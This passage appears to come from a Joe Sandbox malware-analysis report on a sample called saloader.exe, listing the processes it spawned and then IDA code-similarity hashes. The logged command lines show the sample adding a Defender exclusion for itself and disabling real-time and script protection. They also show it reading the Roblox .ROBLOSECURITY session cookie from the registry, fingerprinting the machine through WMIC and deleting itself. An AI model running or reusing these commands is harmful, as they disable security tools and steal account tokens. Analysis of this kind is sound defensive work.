                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:20:29:03
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe"
                                                                                        Imagebase:0x7ff7e3290000
                                                                                        File size:23'040 bytes
                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:20:29:03
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:20:29:03
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:20:29:03
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:20:29:06
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                        Imagebase:0x7ff7fb730000
                                                                                        File size:496'640 bytes
                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:14
                                                                                        Start time:20:29:10
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:20:29:10
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:17
Start time:20:29:13
Start date:29/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:0x7ff741d30000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:18
Start time:20:29:13
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:19
Start time:21:46:01
Start date:29/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:0x7ff741d30000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:21:46:01
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:21:46:18
Start date:29/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:"wmic.exe" os get Caption
Imagebase:0x7ff65e6e0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:21:46:18
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:21:46:19
Start date:29/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:"wmic.exe" computersystem get totalphysicalmemory
Imagebase:0x7ff65e6e0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:21:46:19
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:21:46:19
Start date:29/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:"wmic.exe" csproduct get uuid
Imagebase:0x7ff65e6e0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:21:46:19
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:21:46:20
Start date:29/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:0x7ff741d30000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:21:46:20
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:21:46:38
Start date:29/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:"wmic" path win32_VideoController get name
Imagebase:0x7ff65e6e0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:21:46:38
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:21:46:43
Start date:29/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pause
Imagebase:0x7ff616770000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:34
Start time:21:46:43
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:35
Start time:21:46:43
Start date:29/11/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:ping localhost
Imagebase:0x7ff764aa0000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (79O$/$/$/$/$/
                                                                                          • API String ID: 0-3247863568
                                                                                          • Opcode ID: c0c407c94ee38ae83058fb58383fc91d69089450f49fc8dc03a49a4675f9557e
                                                                                          • Instruction ID: eb26cf722b8fe338cc339e4532ab4eee9b9203e9905e1e45cd9c747abcef7c7b
                                                                                          • Opcode Fuzzy Hash: c0c407c94ee38ae83058fb58383fc91d69089450f49fc8dc03a49a4675f9557e
                                                                                          • Instruction Fuzzy Hash: 50A24E71618A4ACFEB89EF28C455AA973F1FF59300F5045A9D41ECB296CF35E846CB80
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0\9O$8h$8h$x69O$x69O$x69O
                                                                                          • API String ID: 0-852040939
                                                                                          • Opcode ID: d5ade7a7adfc4cc538752c98267066e23b5ca0161ea9d434d6f18612353b5851
                                                                                          • Instruction ID: 114ac6d9e00d6be993284a52f048215d1ee3f523de0b3ddfa3777294299b89c5
                                                                                          • Opcode Fuzzy Hash: d5ade7a7adfc4cc538752c98267066e23b5ca0161ea9d434d6f18612353b5851
                                                                                          • Instruction Fuzzy Hash: BA82E53690D65A8FEB55DB78D8516E97BF0FF46310F1481BAD04DCB293CE28E8468781
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kJ_L$KL
                                                                                          • API String ID: 0-1549098971
                                                                                          • Opcode ID: 148403305a14f531d4c3ee815831c330f2891470a0aef0eb70dd0aa40871c42a
                                                                                          • Instruction ID: 8474f71cb9f37082b1ee0a5baa11b688a372240b8ba8b1fb6e3ac26e94cf472b
                                                                                          • Opcode Fuzzy Hash: 148403305a14f531d4c3ee815831c330f2891470a0aef0eb70dd0aa40871c42a
                                                                                          • Instruction Fuzzy Hash: CE335F7061DB498FE7A5DB18C495ABA77E1FF99300F20957DD08EC3292DE34E8468782
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: [2_^$/
                                                                                          • API String ID: 0-2332170901
                                                                                          • Opcode ID: ddba48c3d04f6cc7ca7c6eff00c03356346b871571ef3b96d4cbcc9e030444fd
                                                                                          • Instruction ID: ded54f34715e9ab0811d9267b0b521eef4778ce25149096ff0c92bba0cb0987f
                                                                                          • Opcode Fuzzy Hash: ddba48c3d04f6cc7ca7c6eff00c03356346b871571ef3b96d4cbcc9e030444fd
                                                                                          • Instruction Fuzzy Hash: 5B025822A1DA468FE796E73CD8956F97BE1FF46310B1841BAD04DC7293DE18E84987C0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9f99349938a7acb65453ec6ddbe78aa5d9ba268c87eba7e2df4a392dfb1c2fb
                                                                                          • Instruction ID: 0a9bf5319afb3eab4c49c83bbc46ed14e593829ffc1bf8f918c6ad2a299e6a86
                                                                                          • Opcode Fuzzy Hash: e9f99349938a7acb65453ec6ddbe78aa5d9ba268c87eba7e2df4a392dfb1c2fb
                                                                                          • Instruction Fuzzy Hash: F313B6B191D3858FE7669F24C4426A57BF0EF57304F1485BEC48E8B193DE38A44ACB92
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (%
                                                                                          • API String ID: 0-1001719454
                                                                                          • Opcode ID: 720d6b0abbf93b77b28833a74caa8d970c39eb2fb808b1ba7b16dc8af5e8a025
                                                                                          • Instruction ID: facbcdf28934c3d7cafd23564ed184604a480641cbe02fad4cc7adf899ef0e43
                                                                                          • Opcode Fuzzy Hash: 720d6b0abbf93b77b28833a74caa8d970c39eb2fb808b1ba7b16dc8af5e8a025
                                                                                          • Instruction Fuzzy Hash: 4BF1287190D68A8FEB56DF28C8516B67BF1FF56320F0445BAD05DD71C2DA28E80ACB81
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: b6564c9bd14ac40a22a5f44ed8c0a7931d02790e16a24f11a23323b7745cb844
                                                                                          • Instruction ID: 381b24d7df0cbbb03856d25bde305ce0fdd86b0e987daad33657a76ae79acd05
                                                                                          • Opcode Fuzzy Hash: b6564c9bd14ac40a22a5f44ed8c0a7931d02790e16a24f11a23323b7745cb844
                                                                                          • Instruction Fuzzy Hash: 1DC1C731A19A0A8FF79ADB2888557B977E1FF5A310F4441BAD41EC32D2DD28EC4587C1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 863ad5fc3250fa9c2dc4b15c9d94cd8270c355264f50ec0e271b997854d10a6a
                                                                                          • Instruction ID: ba9797d75cb4ef1c0d2dcaff8a4ea02023781a623466e1bd7529998bf81bca75
                                                                                          • Opcode Fuzzy Hash: 863ad5fc3250fa9c2dc4b15c9d94cd8270c355264f50ec0e271b997854d10a6a
                                                                                          • Instruction Fuzzy Hash: 56910531A196068FE796EB78D8956F97BE1FF89310F1841BAD04DC7293DE24A8458BC0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 3f07d471b565b200c1414e585642678c41440ee83669eb78fe96df6da000e375
                                                                                          • Instruction ID: 940f9493f0cf2560f9ed788342af49a5209da0395e741c13c894090f3e73d55f
                                                                                          • Opcode Fuzzy Hash: 3f07d471b565b200c1414e585642678c41440ee83669eb78fe96df6da000e375
                                                                                          • Instruction Fuzzy Hash: 5A910531E196068FE796EB38D8556F97BE1FF89310F1841BAD04DC7293DE24A8458780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 2b5440dc5d675ccae5e2f61581ed99766c5521e1861ef4bce319da03846141cc
                                                                                          • Instruction ID: 95fc88acb97cae19fd423bea158d99f0ad7505dc59d37e4e7d7630d8584561dd
                                                                                          • Opcode Fuzzy Hash: 2b5440dc5d675ccae5e2f61581ed99766c5521e1861ef4bce319da03846141cc
                                                                                          • Instruction Fuzzy Hash: 2F81F531E19A0A8FE796EB38D8556F97BE1FF89310F5841BAD04DC7293DE24E8458780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 89ca464fed329dc60a888a39a9bf8b7df3c8c6c1518fc2707b8b4b3302fffc92
                                                                                          • Instruction ID: 6e6d1f41f6bd3a75ff893a17e2d6eeaf966fccfd7b32147a87669bc8ff9e332d
                                                                                          • Opcode Fuzzy Hash: 89ca464fed329dc60a888a39a9bf8b7df3c8c6c1518fc2707b8b4b3302fffc92
                                                                                          • Instruction Fuzzy Hash: C781F631A1DA0A8FE796EB78C8556F97BE1FF89310F5841BAD04DC7293DE24E8458780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 237cc556b8e43bd49a0048bd24478c6a67d6631e25b3c638816e4b7a34390e37
                                                                                          • Instruction ID: c61dc0ede68d406713b49ffea4f68a5fb619b98d6cfaddb056a621fec7c273db
                                                                                          • Opcode Fuzzy Hash: 237cc556b8e43bd49a0048bd24478c6a67d6631e25b3c638816e4b7a34390e37
                                                                                          • Instruction Fuzzy Hash: 29818231A1DA0A8FFB5ADB289456BB877E1FF59310F44817AE41EC32D2DD24EC458B81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0b4b6281d72266a74da941cbf97ac991ed60e867a9d1f67870ecb1e49799409
                                                                                          • Instruction ID: e3e6abbc0d679e53e4cc164903674aef5d0097451d5be2a1f6d42ac49a079fcc
                                                                                          • Opcode Fuzzy Hash: a0b4b6281d72266a74da941cbf97ac991ed60e867a9d1f67870ecb1e49799409
                                                                                          • Instruction Fuzzy Hash: 6142A27061CA4A8FEB9DEB18C091AB5B3E1FFA9304B24957DD04EC3586DE35F8468780
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b5fa08cd36fe07d833f478fc7db25a6bab9ba2da8d773395412b108432f363f
                                                                                          • Instruction ID: 24cb27c3860b3d3cfd8e7bc46350da2939f4d7d196599eff0654891d0e69a56c
                                                                                          • Opcode Fuzzy Hash: 5b5fa08cd36fe07d833f478fc7db25a6bab9ba2da8d773395412b108432f363f
                                                                                          • Instruction Fuzzy Hash: 30425D70A19A098FEB99DB28C495BB5B3E1FF59300F1091B9D44EC7291DE35F885CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 72bd1737d50f682fb52cba2841261abf4507fe5755d19701d01e5bc3ec921302
                                                                                          • Instruction ID: 8be933a5d7aeb96ebb306d1300909a6e9df70399d57a8ac1824343440ab923a4
                                                                                          • Opcode Fuzzy Hash: 72bd1737d50f682fb52cba2841261abf4507fe5755d19701d01e5bc3ec921302
                                                                                          • Instruction Fuzzy Hash: E922297090DB858FE75BDB288861565BBE1EF97300B1991FAD04DC71A3DD28EC4AC782
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b22fd09a70b98a8eda54ed198552d2e64efcae1269f700d0761792249e7ea85b
                                                                                          • Instruction ID: dcec6e0cb28078e7fa4c7b8a4dbf5223457d63edd5b2c545908c22afce2cde07
                                                                                          • String ID: XV$S9O
                                                                                          • API String ID: 0-3315407438
                                                                                          • Opcode ID: 77613448aec3cfdea575436d904062850355fb0177ad67ebb974d119a18ba71b
                                                                                          • Instruction ID: 762509cda8818b54e2ad087e5aa79bb86fa119abdca05189c27ed846ba131ce8
                                                                                          • Opcode Fuzzy Hash: 77613448aec3cfdea575436d904062850355fb0177ad67ebb974d119a18ba71b
                                                                                          • Instruction Fuzzy Hash: 15E1F772A1DA498FEB59EB28C455AB97BE1FF96300F1441BDD04EC7292CE24EC46C781
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (\9O$(\9O
                                                                                          • API String ID: 0-3269100254
                                                                                          • Opcode ID: af433d99b2ce2a7e8b5b5b89a7dbfa180416bd111c5e6b01efaf4cede6e4bcf9
                                                                                          • Instruction ID: 9d56e517977fe684d27fb81d67a19dd92a6d66ae0547b1788786bc80882f915c
                                                                                          • Opcode Fuzzy Hash: af433d99b2ce2a7e8b5b5b89a7dbfa180416bd111c5e6b01efaf4cede6e4bcf9
                                                                                          • Instruction Fuzzy Hash: C5A19835608A4E8FDB89EF2CC455AA973F2FF99310B5441A9D40AC7296DF34EC42CB80
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Z2_^$/
                                                                                          • API String ID: 0-1452589840
                                                                                          • Opcode ID: 3cd2356cef9a59b05dd2427d277917babf38373ed29cf26d91e98499d1700c2a
                                                                                          • Instruction ID: 028b0b9b959d2e1dbdfbf088bca9bcd99cb3e43573d4e02371dd772f5fd57fb6
                                                                                          • Opcode Fuzzy Hash: 3cd2356cef9a59b05dd2427d277917babf38373ed29cf26d91e98499d1700c2a
                                                                                          • Instruction Fuzzy Hash: DA810731A1DA0A8BE796E73898556F97BE1FF8A310F5441BAD04EC3293DE24D8458780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Z2_^$/
                                                                                          • API String ID: 0-1452589840
                                                                                          • Opcode ID: c251e3f82984b1d9d06428521018d86973878f330f06ca3bf359f58e194f673e
                                                                                          • Instruction ID: 9a56c26cd7ba7a55f22082b1d935593e8d3f26c8c504f229aa4e3870c360cf45
                                                                                          • Opcode Fuzzy Hash: c251e3f82984b1d9d06428521018d86973878f330f06ca3bf359f58e194f673e
                                                                                          • Instruction Fuzzy Hash: 4781F731A1DA4A8FE796EB3888556F97BE1FF9A310F5441BAD04EC3293DE24DC458780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: XV$S9O
                                                                                          • API String ID: 0-3315407438
                                                                                          • Opcode ID: 26bace8277a4131f9271c6f04e2c9ec0bd85c7a10edf215f74cb59649b8058a7
